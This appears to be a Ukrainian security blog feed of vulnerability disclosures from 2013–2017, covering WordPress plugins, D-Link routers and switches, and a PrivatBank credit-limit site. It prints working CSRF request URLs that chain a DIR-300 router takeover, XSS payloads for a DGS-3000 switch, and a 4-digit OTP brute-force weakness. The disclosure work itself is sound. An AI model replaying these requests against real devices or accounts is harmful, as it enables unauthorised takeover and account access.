Добірка уразливостей
17:24 11.10.2017В даній добірці уразливості в веб додатках:
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах No External Links, Commentator, Extredj, Appointment Booking Calendar, Easy Gallery. Для котрих з’явилися експлоіти.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
17.03.2016
У січні, 29.01.2015, я виявив Cross-Site Request Forgery уразливості в D-Link DIR-300. Це Wireless Router і AP.
Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DIR-300 та D-Link DGS-3200-16.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
30.09.2017
Після попередніх AoF, BF та CSRF уразливостей, тримайте нові Cross-Site Request Forgery дірки. Для захоплення контролю над пристроєм потрібно зробити декілька CSRF запитів: змінити пароль, логін при цьому фіксований (це раніше згадана AoF уразливість), увімкнути віддалений доступ та зберегти налаштування.
Cross-Site Request Forgery (WASC-09):
Зміна паролю адміна:
http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|
Додати налаштування для увімкнення віддаленого доступу:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1
Зміна налаштування для увімкнення віддаленого доступу:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1
Видалення налаштування віддаленого доступу:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1
Збереження всіх змінених налаштувань пристрою:
http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y
Уразлива версія D-Link DIR-300NRUB5, Firmware 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою.
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах NextGEN Gallery, AzonPop, JS External Link Info, Symposium Pro Social Network, Tubepress. Для котрих з’явилися експлоіти.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
В даній добірці уразливості в веб додатках:
У серпні, 31.08.2013, я знайшов Cross-Site Scripting, Insufficient Anti-automation та інші уразливості на сайтах http://limit.pb.ua та http://limit.privatbank.ua. Це два домени одного сайту, тому всі уразливості однакові на них обох (зараз limit.pb.ua перенаправляє на limit.privatbank.ua). Тоді у вересні вислав всі ці уразливості банку.
Якщо всі дірки ПриватБанк підтвердив і взяв в роботу, то лише одну найбільш важливу дірку (з витоком даних клієнтів) ПБ виправив через два місяці та пізніше виплатив мені премію. Про інші дірки, як згадана в попередньому пості XSS і ця Insufficient Anti-automation, жодної відповіді за чотири роки я не отримав. Хоча нагадував їм про попередні уразливості в 2014-2016 роках. Торік я виявив, що ПриватБанк вже виправив всі інші уразливості (але без жодних премій мені) шляхом повної переробки сайту.
Стосовно ПриватБанка я вже писав про уразливості на acsk.privatbank.ua та уразливості на limit.privatbank.ua.
Insufficient Anti-automation:
На сторінці http://limit.pb.ua/verify (http://limit.privatbank.ua/verify) немає захисту від автоматизованих атак. Що дозволяє спамити смсками.
Insufficient Anti-automation:
На сторінці http://limit.pb.ua/verifySMS (http://limit.privatbank.ua/verifySMS) немає захисту від автоматизованих атак. Що дозволяє підбирати OTP висланий в смсці.
OTP код всього 4 символи, що всього 10000 комбінацій - це легко підбирається. І немає захисту від підбору OTP. Тому можна легко отримати доступ до акаунту користувача без наявності мобільного телефону жертви, щоб дізнатися кредитний ліміт і змінити його.
Дані уразливості та деякі інші не були виправлені в 2013 році. Але вже в 2016 році всі вони були виправлені. Проте я знайшов нові уразливості на limit.privatbank.ua, про які повідомив ПБ наприкінці минулого року і вони виправили їх.
28.07.2017
Сьогодні я знайшов Cross-Site Scripting та Content Spoofing уразливості в D-Link DGS-3000-10TC. Це Gigabit Ethernet Switch.
Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DAP-1360 та D-Link DGS-3200-16.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
16.09.2017
Cross-Site Scripting (WASC-08):
http://site/html/errorpage.html?%22;alert(document.cookie);//
Cross-Site Scripting (WASC-08):
http://site/html/errorpage.html
Атака через заголовок “Referer: javascript:alert(document.cookie)”.
Content Spoofing (WASC-12):
http://site/html/errorpage.html?You%20are%20hacked!
Можлива Text Injection атака.
Уразлива версія D-Link DGS-3000-10TC, Firmware Version 2.00.006. Дана модель з іншими прошивками також повинна бути вразливою.
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Content Text Slider, NextGEN Gallery, Simple Ads Manager, Symposium Pro Social і темі Stanford. Для котрих з’явилися експлоіти.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
В даній добірці уразливості в веб додатках: